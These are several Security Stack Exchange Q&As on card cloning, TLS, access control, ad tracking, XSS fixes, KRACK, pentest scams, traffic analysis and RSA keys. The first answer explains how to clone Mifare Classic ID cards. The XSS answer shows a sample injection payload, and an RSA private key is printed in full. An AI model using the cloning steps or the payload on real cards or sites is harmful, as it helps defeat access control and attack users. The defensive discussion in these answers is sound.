The head of our IT department and Networking class in my college has given me and another student a challenge; he told us that if we could clone the NFC tags in our student ID's used to sign in on time, he would give one of us unlimited access to the colour printers for a year. His main motto that he always talks about though is encouraging students to learn through experimentation regardless of whether the students ideas will work or not. He wants us to experience failure as well as success through our own attempts. I'm a bit skeptical as to whether it will work because I've read forums online that say this a futile attempt because no reputable academic institution or business would leave their NFC tags unprotected and completely vulnerable to complete cloning. From scanning the card with my Android phone, I see that it uses a Mifare Classic 1k tag. Does anyone have an idea how to replicate it? There are some cheap tags on eBay but I wonder if I should bother if it's not even possible to clone it.
Many NFC enabled smartphones can write to these cards with an app like MifareClassicTool . However I've found several phones seem to be able to do it when in reality trying to write to Sector-0 bricks the card. It may be worth testing one or two cards and if it doesn't work buy a dedicated USB writer. First of all a huge number of Mifare Classic Systems only use the ID on the card. This is stored in Sector-0 which is theoretically read only. Of course plenty of online sources will happily sell you cards where this is writable. Writing to the cards themselves is trivial. The encryption on the cards has also been broken and again can be trivially cracked on a smartphone, as seen on Wikipedia: Security of MIFARE Classic, MIFARE DESFire and MIFARE Ultralight . My university used the same cards. As did an Oracle facility I used to work at…
{ "source": [ "https://security.stackexchange.com/questions/170756", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156813/" ] }
170,833
I have an upcoming oral network security exam and know that in past exams, the professor asked about why TLS requires TCP. I know that there is DTLS but it wasn't part of the lecture. So the question is about what advantage TLS gains by requiring its underlying protocol to be TCP, I guess. I already heard some wild guesses but no convincing arguments. In the beginning of the RFC, it says : At the lowest level, layered on top of some reliable transport protocol (e.g., TCP [TCP]), is the TLS Record Protocol. Seemingly everywhere else (according to my judgment), the RFC doesn't only require "some reliable transport protocol" but TCP in particular.
TLS requires a reliable transport. On the internet, this leaves only TCP, as UDP does not offer reliability. TLS does require a reliable transport because (in compliance with the layered architecture of the ISO/OSI reference model) it does not handle transport errors, lost packets or other disturbances that may occur with IP. TLS is designed to offer a secure channel on top of a reliable transport and it does this quite well. DTLS does (I assume) the necessary error handling within the protocol. If TLS was to be performed over UDP, connections and handshakes could fail just because a packet got lost in transit and no one noticed. Mitigation of such problems is (according to the ISO/OSI reference model) the designated task of a reliable transport. Any reliable transport works theoretically, yet for all practical purposes of IP networks, this usually implies TCP.
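You can see this layering directly in code: TLS APIs typically wrap an already-connected TCP socket and rely on it for in-order, lossless delivery. A short Python standard-library sketch (the host name is just an example):

```python
import socket
import ssl

context = ssl.create_default_context()

# First a reliable TCP connection, then TLS layered on top of it.
with socket.create_connection(("example.com", 443)) as tcp_sock:
    with context.wrap_socket(tcp_sock, server_hostname="example.com") as tls_sock:
        print("protocol:", tls_sock.version())
        print("cipher:  ", tls_sock.cipher())
```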
{ "source": [ "https://security.stackexchange.com/questions/170833", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88961/" ] }
171,022
In my application, users have certain roles which have permissions. These permissions dictate which UI elements are available to them at the home screen. Many of the elements link to other pages, which many users cannot see because their permissions do not allow them to go to that web page. For example, a button called button1 links to a random page in the application, let's say http://www.example.com/example.jsp . The user John however, has permissions set that don't allow him to see button1 . Therefore John cannot go to http://www.example.com/example.jsp . The issue I'm having is that if I am signed in as John, and I paste that URL, it will take me to the page. Obviously this is a huge security risk if an attacker gets the URL to an administrator page for example. So, how can I protect against this? Do I need to verify the user for every single page, checking permissions and making sure that they are allowed to be there? There are hundreds of pages in this application and that seems very redundant and not efficient to include code on every page to do so. Is there an easier way to do this than the method I just mentioned?
Do I need to verify the user for every single page? Absolutely. Not only every page, but every request to a privileged resource, e.g. a POST request to update data, delete, view, etc. It is not just about viewing the pages, it is about controlling who can do what on your system. It sounds like your entire authentication and permissions system is broken in its current implementation. The steps to remedy this are too broad for this one answer. It would be worth a general search of this forum and the wider net to find solutions suitable for your framework (JSP, ASP.Net, PHP, etc.). Most frameworks have out-of-the-box functionality for solving this problem. A good start would be this high level guide from OWASP: Operational Security: Administrative Interfaces .
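To avoid literally adding a check to hundreds of pages, the check is usually written once and applied to every privileged route, for example as middleware or a decorator. Here is a hedged Python/Flask sketch of the pattern; the permission names and the way the current user is looked up are placeholders, and JSP/ASP.NET/PHP frameworks have equivalent filter or attribute mechanisms:

```python
from functools import wraps
from flask import Flask, abort, g

app = Flask(__name__)

def require_permission(permission):
    """Decorator that enforces a permission check on every request to the view."""
    def decorator(view):
        @wraps(view)
        def wrapped(*args, **kwargs):
            user = getattr(g, "current_user", None)  # set by your auth layer
            if user is None or permission not in user.get("permissions", ()):
                abort(403)
            return view(*args, **kwargs)
        return wrapped
    return decorator

@app.route("/admin/reports")
@require_permission("view_reports")  # hypothetical permission name
def reports():
    return "only users holding view_reports can reach this"
```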
{ "source": [ "https://security.stackexchange.com/questions/171022", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128304/" ] }
171,055
Yesterday I was searching DuckDuckGo for booking a vacation. I ended up reading a lot on one specific website. Today multiple websites show me Google banners from this specific website. Normally, I never look up websites for booking a vacation. I use DuckDuckGo on purpose, to prevent these kind of things. My question therefore is: how is this possible? I'm 100% certain that I didn't accidentally Google something. The website I was reading was this , if that helps.
Loading that page loads https://www.googleadservices.com/pagead/conversion.js https://www.googletagmanager.com/gtm.js?id=GTM-WPPRGM https://stats.g.doubleclick.net/dc.js The reason Google can track you is that the website shares details of your visit with them - in this case via loading Google JavaScript code for their ads service. To expand on this: the Google ad code will use a cookie to track you. But even if it didn't, there are browser fingerprinting mechanisms which in most cases can correctly identify a user's machine even after a full browser cache / history clear. When you visit a site with ads, a request is made to the ad provider's server. This sends the ID associated with you to say "an ad on [x website] for [user y] is available". The ad providers nowadays often then auction off the slot in real time, in 1/100th of a second, where potential advertisers' computers can bid for the advert space. The site you visited is djoser. Since djoser knows you looked at products on their site yesterday, they know there is a reasonable chance you are considering buying something from them. So when you visit another site somewhere else, the ad slot on that other site is more valuable to djoser, and they bid higher than anyone else - hence why you keep seeing them.
{ "source": [ "https://security.stackexchange.com/questions/171055", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59594/" ] }
171,354
I'm working for an ecommerce website written in C#.net (no CMS used, quite a lot of code) where security hasn't been a priority for a long time. My mission right now is to find and fix any XSS breaches. There is a lot of non-filtered data written directly in the rendered HTML. What is my best strategy to cure the code without having to read every single page?
I propose the following four-step program, where you first pick the low hanging fruit to give you some minimum of protection while you work on the bigger problems. 1. Activate client side filtering 1.1 Set the X-XSS-Protection header Setting the following HTTP response header will turn on the browser's built-in XSS protection: X-XSS-Protection: 1; mode=block This is by no means waterproof, and it only helps against reflected XSS, but it's something. Some old versions of IE (surprise, surprise) have a buggy filter that actually might make things worse, so you might want to filter out some user agents. 1.2 Set a content security policy If you do not use inline JavaScript in your app, a CSP can help a lot. Setting script-src 'self' will (a) limit script tags to only include scripts from your own domain, and (b) disable inline scripts. So even if an attacker could inject <img onerror="alert('XSS')"> the browser will not execute the script. You will have to tailor the value you use for the header to your own use, but the linked MDN resource should help you with that. But again, this is not waterproof. It does nothing to help users with a browser that doesn't implement CSP (see here ). And if your source is littered with inline scripts you will have to choose between cleaning that up or abstaining from using CSP. 2. Activate server side filtering John Wu has a good suggestion in comments: Also, since this is .NET, a very quick and easy change can turn on ASP.NET Request Validation which can catch a variety of XSS attacks (but not 100% of them). If you are working in another language, you might instead consider using a web application firewall (as suggested by xehpuk ). How easy a WAF is to configure for you depends on what application you are protecting. If you are doing things that make filtering inherently hard (e.g. passing HTML in GET or POST parameters) it might not be worth the effort to configure one. But again, while a WAF might help, it is still not waterproof. 3. Scan and fix Use an automated XSS scanner to find existing vulnerabilities and fix these. As a complement you can run your own manual tests. This will help you focus your precious time on fixing easy to find vulnerabilities, giving you the most bang for the buck in the early phase. But for the third time, this is not waterproof. No matter how much you scan and test, you will miss something. So, unfortunately, there is a point #4 to this list... 4. Clean up your source code Yes, you will "have to read every single page". Go through the source and rewrite all code that outputs data using some kind of framework or template library that handles XSS issues in a sane way. (You should probably pick a framework and start using it for the fixes you do under #3 already.) This will take a lot of time, and it will be a pain in the a**, but it needs to be done. Look at it from the bright side - you have the opportunity to do some additional refactoring while you are at it. In the end you will not only have solved your security problem - you will have a better code base as well.
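For steps 1.1 and 1.2, the headers themselves are one-liners once you have a central place to set them. Below is an illustrative Python/Flask hook; in the ASP.NET application from the question you would set the same headers in web.config or in a response filter, and the CSP value shown is only an example you would tailor to your own site:

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_security_headers(response):
    response.headers["X-XSS-Protection"] = "1; mode=block"
    # Example policy: everything from our own origin, no inline scripts.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self'"
    )
    return response
```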
{ "source": [ "https://security.stackexchange.com/questions/171354", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80876/" ] }
171,356
Today new research was published on vulnerabilities in wireless network security called Krack . What are the real-world consequences of these attacks for users and owners of wireless networks, what can an attacker actually do to you? Also is there anything a wireless network owner can do apart from contact their vendor for a patch?
Citing the relevant parts from https://www.krackattacks.com : Who is vulnerable? Both clients and access points are listed in the paper as being vulnerable. See the tables 1 and 2 on pages 5 and 8 for examples of vulnerable systems, and table 3 on page 12 for an overview of which packets can be decrypted. The weaknesses are in the Wi-Fi standard itself, and not in individual products or implementations. Therefore, any correct implementation of WPA2 is likely affected. [...] the attack works against personal and enterprise Wi-Fi networks, against the older WPA and the latest WPA2 standard, and even against networks that only use AES. What is the impact? adversaries can use this attack to decrypt packets sent by clients , allowing them to intercept sensitive information such as passwords or cookies. The ability to decrypt packets can be used to decrypt TCP SYN packets. This allows an adversary to [...] hijack TCP connections. [An adversary can thus inject] malicious data into unencrypted HTTP connections. If the victim uses either the WPA-TKIP or GCMP encryption protocol, instead of AES-CCMP, the impact is especially catastrophic. Against these encryption protocols, nonce reuse enables an adversary to not only decrypt, but also to forge and inject packets. our attacks do not recover the password of the Wi-Fi network (Emphases mine.) Can we patch it (and will we have incompatible APs/clients)? There is a fix for both APs and clients, it doesn't matter which one you patch first. implementations can be patched in a backwards-compatible manner [...] To prevent the attack, users must update affected products as soon as security updates become available. [...] a patched client can still communicate with an unpatched access point, and vice versa. However, both client and router must be patched (or confirmed secure): both the client and AP must be patched to defend against all attacks [...] it might be that your router does not require security updates. We strongly advise you to contact your vendor for more details [...] For ordinary home users, your priority should be updating clients such as laptops and smartphones. How does it work? When a client joins a network, it [...] will install this key after receiving message 3 of the 4-way handshake. Once the key is installed, it will be used to encrypt normal data frames using an encryption protocol. However, because messages may be lost or dropped, the Access Point (AP) will retransmit message 3 if it did not receive an appropriate response as acknowledgment. [...] Each time it receives this message, it will reinstall the same encryption key, and thereby reset the incremental transmit packet number (nonce) and receive replay counter used by the encryption protocol. We show that an attacker can force these nonce resets by collecting and replaying retransmissions of message 3 of the 4-way handshake. By forcing nonce reuse in this manner, the encryption protocol can be attacked, e.g., packets can be replayed, decrypted, and/or forged. Is there anything a wireless network owner can do apart from contact their vendor for a patch? As mentioned, WPA-TKIP or GCMP are slightly worse, so make sure you use AES-CCMP for the lowest impact -- if your router allows you to choose that (many don't). Other than that, you can't truly mitigate it on a protocol level yourself. Just update as soon as possible. 
Generally, use HTTPS for anything that needs to be secure (you should do this anyway, also over ethernet, but especially over Wi-Fi now), use a VPN as an extra layer, etc.
{ "source": [ "https://security.stackexchange.com/questions/171356", "https://security.stackexchange.com", "https://security.stackexchange.com/users/37/" ] }
171,402
Following on from this question , I am unclear on which of the following steps are sufficient to protect a WPA2-based wifi connection from the KRACK flaw: Patching the AP (e.g. router) Patching the client (e.g. mobile device) Patching the AP and the client The currently most upvoted answer , citing https://www.krackattacks.com states: Both clients and access points are listed in the paper as being vulnerable. and: implementations can be patched in a backwards-compatible manner [...] To prevent the attack, users must update affected products as soon as security updates become available. [...] a patched client can still communicate with an unpatched access point, and vice versa. But this seems to leave open the question of which combination(s) of patches would be an effective fix. It's clear for example that if I were to patch my phone, it would still be able to communicate with an unpatched AP, but would that communication be secure? This is an important question, because while it is relatively easy to make sure my clients are patched once the patch is available (since the number of OS vendors are relatively small), ensuring all routers are patched (particularly in public wifi APs) seems like a much harder task due to the number and size of the vendors, and the lack of control over third party hardware.
To fully protect your network, both the device and the access point will need to be patched: Source: https://www.krackattacks.com/#faq Finally, although an unpatched client can still connect to a patched AP, and vice versa, both the client and AP must be patched to defend against all attacks!
{ "source": [ "https://security.stackexchange.com/questions/171402", "https://security.stackexchange.com", "https://security.stackexchange.com/users/17049/" ] }
171,408
Everyday we visit many websites, including our university's website, maybe Google, Yahoo, etc. But on each of them, we have a unique username, while each person in a country can have a "national code" such that no persons share a code. So, they could use their national code as their username on every website. Why not? Why isn't this the situation? Wouldn't it be better if we had one username for all of the websites in the world? Does it have something to do with security?
Privacy . Being able to link every user account to a natural person would be the end of anonymity on the Internet. Maybe you have nothing to hide, so that's of no concern for you. But as Edward Snowden said: "Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say" . Not every person on the planet would have a national ID number. There are countries in the world which don't give ID numbers to their citizens. In some regions of the world, residency registration is spotty at best or nonexistent. People from these countries could no longer actively use the Internet anymore. Also, there are edge-cases like stateless people, people with multiple citizenships or people from disputed territories. In those countries which do have ID numbers, you have the problem of proving that someone is indeed the owner of an ID number . Because your ID number is public knowledge, I could use it to register in your name on any website I want, thus stealing your identity. A solution to this problem would be a state-supported authentication service (something like OAuth). But considering how many governments there are in the world, it would be impossible to agree on a protocol standard which is supported by everyone all over the world. And if you do somehow get the ~200 or so governments in the world to cooperate on something (a feat worthy of a Nobel Peace Prize), you now put a tremendous responsibility into their hands. Not only could they very easily prevent their citizens from using any services they don't like by no longer authenticating their citizens to it, they could also impersonate their citizens on any website.
{ "source": [ "https://security.stackexchange.com/questions/171408", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102580/" ] }
171,415
I’m still in the planning stage so this may not be fully fleshed out, but I’m working on a SaaS project. Part of which allows users (customers of my SaaS) to configure my API to watch for events and respond in a preconfigured way. One response is for my API (built in PHP) to kick off a POST HTTP request to a URL provided during setup, with given parameters. It is intended that user will point these requests to their own server or other internal system and then be able to listen for these requests and integrate it with their own internal email/tracking/payment systems. However, I’m a bit worried about giving these users free reign over who they get my server to POSTs requests too. Assuming I sanitize the URL input and any parameters, and throttle the number of requests it can send out, is there any potential malicious use cases stemming from a user triggering POSTs from my API?
{ "source": [ "https://security.stackexchange.com/questions/171415", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83603/" ] }
171,438
From what I've read, the issue is as simple as performing step 3 of a 4-step handshake and the consequences of performing that step more than once. Considering the complexity of these kinds of algorithms, I'm somewhat surprised that it is so 'simple' of a concept. How can it be that a system of this complexity was designed without anyone thinking about what would happen if you performed the step twice? In some sense, it feels like this should have been obvious. It's not really a subtle trick, it's a relatively blatantly obvious defect, or at least that's the impression I'm getting.
The 802.11 specification that describes WPA2 (802.11i) is behind a paywall, and was designed by a few key individuals at the IEEE. The standard was reviewed by engineers, not by cryptographers. The details of the functionality (e.g. retransmission) were not widely known about or studied by security professionals. Cryptographer Matthew D Green wrote a blog post about this subject, and I think this section sums it up quite nicely: One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they’re hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications — you’ll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck. The IEEE has been making a few small steps to ease this problem, but they’re hyper-timid incrementalist bullshit. There’s an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they’ve been public for six months — coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software.
{ "source": [ "https://security.stackexchange.com/questions/171438", "https://security.stackexchange.com", "https://security.stackexchange.com/users/26126/" ] }
171,474
Apologies if this is already answered in the whitepaper, I'm not going to get chance to read it for a few days due to a hectic schedule, but I am already fielding questions from non-techies reading non-technical media news stories making them believe that we should unplug everything and go back to trading gold. What I understand (and please correct me if I'm wrong) is that this essentially allows attackers to set up a MITM attack by forcing a new handshake between devices (yes, that's dumbed down), and that this is a flaw in the basic implementation of the encryption protocol, so it will require a firmware update to fix (yay for helping elderly family and neighbours update the firmware on their routers). I don't see how this would also invalidate the encryption used as part of TLS, but I'm far from an expert on this.
KRACK is on the Network layer of the OSI model , while TLS is on the Session layer. So no, they do not influence each other, provided that the client cannot be tricked into using a non-TLS connection ( SSLstrip ). The basic threat from KRACK is that it allows an attacker to decrypt all packets on the network layer that the victim sends / receives. This includes all cleartext communication (e.g. that which many email programs still employ, local network device connections, etc.). This means that if the network key is exposed in that traffic and an attacker is seeing all of it, they can simply make a full connection to your network and wreak havoc on it any way they see fit. If there are other vulnerabilities in the implementation (e.g., what happens in Android 6), then the attacker can even manipulate packets in transit to the victim (both encrypted and cleartext packets can be manipulated). However, the attacker cannot read their contents if the packets themselves are encrypted by a session layer protocol (e.g. TLS). This opens up the possibility to change key values or redirect the victim to an attacker's site for infection. So while it is a serious breach and must be solved as soon as possible, it should not compromise properly secured traffic. So use a VPN, HSTS , HPKP and ssh to protect yourself and/or your users.
{ "source": [ "https://security.stackexchange.com/questions/171474", "https://security.stackexchange.com", "https://security.stackexchange.com/users/149010/" ] }
171,697
I got sent an article today ( http://hakerin.com/facebook-user-location-finder-noobs/ ). With the click-bait title "Facebook User location Finder" Of course I clicked it. Going through the "article" there is not a lot of details given. And I thought I would try it out. It basically stated that it was possible to find out the location of a Facebook user that sent you a Facebook message. Specifically, by looking at the IP addresses that appear in the "Foreign Address" column of Netstat. To find the geo-location one has to copy the last added IP address from the list into a IP address lookup tool like http://whatismyipaddress.com/ . Then copy the coordinates and use google maps to find the exact location of the person. After some time getting the preferred Netstat arguments and some filtering with awk netstat -ntpw | awk '{print $5}' . The GEO locations the IP addresses hold are mostly in America some in Ireland and some in the Netherlands. When I enter the coordinates in google maps I get unknown locations. This is just fake, right? Or did it used to work like this? If so, that would seem very concerning.
That article is wrong and that website in general seems like a very unreliable source for anything. With the netstat tool, among other stuff, you can see established TCP connections. When you use Facebook messenger (or any other chat), at least one server is between you and the person on the other side, it's not a peer-to-peer connection. Hence the IP you see using netstat is an IP of a chat server (or whatever other obscure infrastructure, not know to us simple users) that you established connection with.
{ "source": [ "https://security.stackexchange.com/questions/171697", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161701/" ] }
171,698
As I understand them, SSL certificates contain a domain name, a public key and the giving CA. Why is it important to include a domain name? Why isn't it enough that the CA considers the public key as trusted and that the said server indeed has the private key associated with it?
{ "source": [ "https://security.stackexchange.com/questions/171698", "https://security.stackexchange.com", "https://security.stackexchange.com/users/160109/" ] }
172,135
My bank has issued a new version of their online banking site. This new version has no virtual keyboard to enter the PIN. I asked them how are they protecting me against keyloggers but I didn't receive any answer.
Virtual keyboards were an easy-to-implement solution to malware that recorded keystrokes from the keyboard and hardware keyloggers. But the keylogger software developers quickly adjusted to this new technique (sometimes by simply taking a screenshot focused around where the mouse clicks). In the end, it is not clear that a virtual keyboard provided any broad benefit. It would certainly defeat a hardware keylogger installed on your keyboard, but that's not the likely threat. Given that keylogging software expects to also capture virtual keyboards, there is little benefit to maintaining this technology in the broad, likely scenario. Tests have been done on the effectiveness of virtual keyboards: https://www.raymond.cc/blog/how-to-beat-keyloggers-to-protect-your-identity/
{ "source": [ "https://security.stackexchange.com/questions/172135", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162214/" ] }
172,148
My company is currently engaged in a security audit framed as a pentest. They've requested all admin passwords for every one of our services and all source code of our software. They want logins for Google Apps, credit card processors, GitHub, DigitalOcean, SSH credentials, database access, and much more. Note, we've never signed a single NDA (but have been provided a statement of work) and I'm very reluctant to provide this info to them because of this. Is this normal for a pentest? I assumed it would mostly be black box. How should I proceed? "UPDATE* We now have an NDA. The contract does, however, say that we can't hold them liable for anything. Still not sure if this is the right move to continue with them. In my experience, their requests aren't normal even in white box audits, and their statement of work reads in a way that doesn't make it clear if this is a white box or black box audit.
Is this normal for a pentest? Absolutely not . Best case scenario: they are performing "social engineering" penetration testing and want to see if you can be pressured into fulfilling a very dangerous action. Middle-case scenario, they don't know how to do their job. Worst-case scenario they are only pretending to be an auditing company and fulfilling their request will result in an expensive breach. In the case of a code-audit the company will obviously need access to source code. However I would expect a company who provides such services to already understand the sensitivity of such a need and have lots of forms for you to sign, and to offer to work in a strictly controlled environment. A reputable security company is going to be concerned not just with protecting you (because it is their job) but also with protecting themselves from untrustworthy clients (Our source code got leaked right after we hired you: we're suing!!!!). All this to say: any reputable security company that doesn't have you sign lots of contracts before going to work is not a reputable security company. I can't imagine any circumstances in which handing over access to any of those things would be a good idea. Edit RE: hidden contracts A few have suggested that the company might have simply not told the OP about any relevant contracts/agreements/NDAs. I suppose this is possible, but I want to clarify that the lack of a contract isn't the only red flag that I see. As someone who has built e-commerce sites and business software that has required integration with many CC Processors, I see absolutely no benefit to giving someone else access to your CC Processor. At that point in time they are no longer penetration testing your systems: they are penetration testing someone else's systems that you happen to use. Indeed, giving out access credentials in such a way likely violates the terms of service that you signed when you started using your CC Processor (not to mention the other systems they are requesting access to). So unless you have permission from your CC Processor to hand your credentials to a security auditing company (hint: they would never give you permission), giving them that access is a huge liability. Many others here have done a great job articulating the differences between white-box and black-box testing. It is certainly true that the more access you give security auditors, the more effectively they can do their jobs. However, increased access comes with increases costs: both because they charge more for a more thorough vetting, and also increased costs in terms of increased liability and increased trust you have to extend to this company and their employees. You are talking about freely giving them complete control over all of your companies systems. I can't imagine any circumstances under which I would agree to that.
{ "source": [ "https://security.stackexchange.com/questions/172148", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78761/" ] }
172,212
Verizon is modifying their "unlimited" data plans. Customers in the USA can stream video at 480p -or- pay to unlock higher resolutions (both 720p and +1080p). They are not the only mobile carrier to implement rules like this . If I am on a site that implements HTTPS for video streaming, say YouTube or Facebook, how do carriers know what resolution I'm watching? If carriers are throttling bandwidth for all data, then talking about video resolutions seems like misdirection. If it's only video, that would seem to raise privacy concerns.
This is an active area of research. I happen to have done some work in this area, so I'll share what I can about the basic idea (this work was with industry partners and I can't share the secret details :) ). The tl;dr is that it's often possible to identify an encrypted traffic stream as carrying video, and it's often possible to estimate its resolution - but it's complicated, and not always accurate. There are a lot of people working on ways to do this more consistently and more accurately. Video traffic has some specific characteristics that can distinguish it from other kinds of traffic. Here I refer specifically to video on demand - not live streaming video. Video on demand doesn't often have those priority tags mentioned in this answer . Also I refer specifically to adaptive video, meaning that the video is divided into segments (each about 2-10 seconds long), and each segment of video is encoded at multiple quality levels (quality level meaning: long-term video bitrate, codec, and resolution). As you play the video, the quality level at which the next segment is downloaded depends on what data rate the application thinks your network can support. (That's the DASH protocol referred to in this answer .) If your phone is playing a video, and you look at the (weighted moving average of) data rate of the traffic going to your phone over time, it might look something like this: (this is captured from a YouTube session over Verizon. There's the moving average over 15 seconds and also short-term average.) There are a few different parts to this session: First, the video application (YouTube player) tries to fill the buffer up to the buffer capacity. During this time, it is pulling data at whatever rate the network can support. At this stage, it's basically indistinguishable from a large file download, unless you can infer that it's video traffic from the remote address (as mentioned in this answer ). Once the buffer is full, then you get "bursts" at sort-of-regular intervals. Suppose your buffer can hold 200 seconds of video. When the buffer has 200 seconds of video in it, the application stops downloading. Then after a segment of video has played back (say 5 seconds), there is room in the buffer again, so it'll download the next segment, then stop again. That's what causes this bursty pattern. This pattern is very characteristic of video - traffic from other applications doesn't have this pattern - so a network service provider can pretty easily pick out flows that carry video traffic. In some cases, you might not ever observe this pattern - for example, if the video is so short that the entire thing is loaded into the buffer at once and then the client stops downloading. Under those circumstances, it's very difficult to distinguish video traffic from a file download (unless you can figure it out by remote address). Anyway, once you have identified the flow as carrying video traffic - either by the remote address (not always possible, since major video providers use content distribution networks that are not exclusive to video) or by its traffic pattern (possible if the video session is long, much more difficult if it is so short that the whole video is loaded into the buffer all at once)... Now, as Hector said , you can try to guess the resolution from the bitrate by looking at the size (in bytes) of each "burst" of data: From the size per duration you could make a reasonable estimate of the resolution - especially if you keep a rolling average. But, this can be difficult. 
Take the YouTube session in my example: Not all segments are the same duration - the duration of video requested at a time depends on several factors (the quality level, network status, what kind of device you are playing the video on, and others). So you can't necessarily look at a "burst" and say, "OK, this was X bytes representing 5 seconds of video, so I know the video data rate". Sometimes you can figure out the likely segment duration but other times it is tricky. For a given video quality level and segment duration, different segments will have different sizes (depending on things like how much motion takes place in that part of the video). Even for the same video resolution, the long-term data rate can vary - a 1080p video encoded with VP9 won't have the same long-term data rate as one encoded with H.264. The video quality level changes according to perceived network quality (which is visible to the network service provider) and buffer status (which is not). So you can look at long-term data rates over 30 seconds, but it's possible that the actual video quality level changed several times over that 30 seconds. During periods when the buffer is draining or filling as fast as possible (when you don't have those "bursts"), it's much harder to estimate what's going on in the video. To complicate things even further: sometimes a video flow will be "striped" across multiple lower-layer flows. Sometimes part of the video will be retrieved from one address, and then it will switch to retrieving the video from a different address. That graph of data rate I showed you just above? Here's what the video resolution was over that time interval: Here, the color indicates the video resolution. So... you can sort of estimate what's going on just from the traffic patterns. But it's a difficult problem! There are other markers in the traffic that you can look at. I can't say definitively how any one service provider is doing it. But at least as far as the academic state-of-the-art goes, there isn't any way to do this with perfect accuracy, all of the time (unless you have the cooperation of the video providers...) If you're interested in learning more about the techniques used for this kind of problem, there's a lot of academic literature out there - see for example BUFFEST: Predicting Buffer Conditions and Real-time Requirements of HTTP(S) Adaptive Streaming Clients as a starting point. (Not my paper - just one I happen to have read recently.)
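As a toy illustration of the burst detection idea described above (and emphatically not the classifier any real carrier uses), here is a short Python sketch that bins observed per-packet byte counts into one-second buckets and prints a moving-average rate, which is the kind of signal the data-rate plot is built from. The packet list is invented:

```python
from collections import defaultdict

# (timestamp_in_seconds, payload_bytes) pairs for one flow; made-up numbers.
packets = [(0.1, 1400), (0.4, 1400), (0.9, 1400), (5.0, 1400), (5.2, 1400), (10.1, 1400)]

bytes_per_second = defaultdict(int)
for ts, size in packets:
    bytes_per_second[int(ts)] += size

WINDOW = 15  # seconds, matching the 15 s moving average mentioned above
last_second = int(max(ts for ts, _ in packets))
for t in range(last_second + 1):
    window = [bytes_per_second[s] for s in range(max(0, t - WINDOW + 1), t + 1)]
    avg_bits_per_second = 8 * sum(window) / len(window)
    print(f"t={t:2d}s  moving average ~ {avg_bits_per_second:,.0f} bit/s")
```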
{ "source": [ "https://security.stackexchange.com/questions/172212", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162321/" ] }
172,274
As far as I remember you encrypt the message using public key and decrypt it using private key. My question is whether it is possible to get a public key from an RSA private key. For example if I have a key like this: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQCtrKVnwse4anfX+JzM7imShXZUC+QBXQ11A5bOWwHFkXc4nTfE Or3fJjnRSU5A3IROFU/pVVNiXJNkl7qQZK5mYb8j3NgqX8zZJG7IwLJ/Pm2sRW5Q j32C/uJum64Q/iEIsCg/mJjDLh1lylEMEuzKgTdWtoeLfxDBL2AJ20qXzQIDAQAB AoGBAKNXi0GpmjnCOPDxLFg5bvQVfhLSFCGMKQny1DVEtsfgZmbixv5R2R41T4+d CHJMdEsUFFJ6I7CRLTcg1SDU8IhcAWCBRSNeVuomCHlQG16ti8HxwhiwIcjvDz/z NC2sL5ZJ2eJnhbtXLdf6pxxO1pA5vLp1AX06IaETO977XvupAkEA+ZgtGZybyUkf tEA3ekXc5eLoW+zgU0C1fATWcIZ8Iq5YV1BW+3oAzf8HgIbkQh4LM2qa6An3l+vW NXR4wICHkwJBALIhrcdJqKw36qiyenq+m78klp5SnurQifVt0Sy1GMWyOUqYz5jK t9sGo9Qn6GDuYe/XGXKWQW25PkEYXxxPPx8CQQCpICyvRidp5VrOURVGjUB5pZ+9 am02/In9V2nXJcnH1kuWHqJSFQGmlEEJHl5dTu5YEMyWnupezzd/UUThbDZxAkAz TNO5QxNalbf04YG4e9Bq2eSur+iog2pXzkqhb3404UDypNOUkz0jzOO9o8ieschu xCnGAFPTf7fYE2bAxmnNAkEA0/3bdsvJclquypqP9CQeQnxGwQtWz6+yn07gj3U1 V19mdeKCUZWklRarrcr67u9DdEx+JowyEY/ppzgeQtW01g== -----END RSA PRIVATE KEY----- can I get a public key?
can I get a public key? It's easy using openssl rsa : $ openssl rsa -in the-private-key-from-your-question.pem -pubout writing RSA key -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtrKVnwse4anfX+JzM7imShXZU C+QBXQ11A5bOWwHFkXc4nTfEOr3fJjnRSU5A3IROFU/pVVNiXJNkl7qQZK5mYb8j 3NgqX8zZJG7IwLJ/Pm2sRW5Qj32C/uJum64Q/iEIsCg/mJjDLh1lylEMEuzKgTdW toeLfxDBL2AJ20qXzQIDAQAB -----END PUBLIC KEY----- If you want to get an idea of what is contained in a key file, you can pass the -text option to see a human-readable (sort of) debug dump. This way you can see that a key file contains not only the private information but also the public information. In particular, it contains the modulus and publicExponent which fully describe the public key: $ openssl rsa -text -in the-private-key-from-your-question.pem Private-Key: (1024 bit) modulus: 00:ad:ac:a5:67:c2:c7:b8:6a:77:d7:f8:9c:cc:ee: 29:92:85:76:54:0b:e4:01:5d:0d:75:03:96:ce:5b: 01:c5:91:77:38:9d:37:c4:3a:bd:df:26:39:d1:49: 4e:40:dc:84:4e:15:4f:e9:55:53:62:5c:93:64:97: ba:90:64:ae:66:61:bf:23:dc:d8:2a:5f:cc:d9:24: 6e:c8:c0:b2:7f:3e:6d:ac:45:6e:50:8f:7d:82:fe: e2:6e:9b:ae:10:fe:21:08:b0:28:3f:98:98:c3:2e: 1d:65:ca:51:0c:12:ec:ca:81:37:56:b6:87:8b:7f: 10:c1:2f:60:09:db:4a:97:cd publicExponent: 65537 (0x10001) privateExponent: (…)
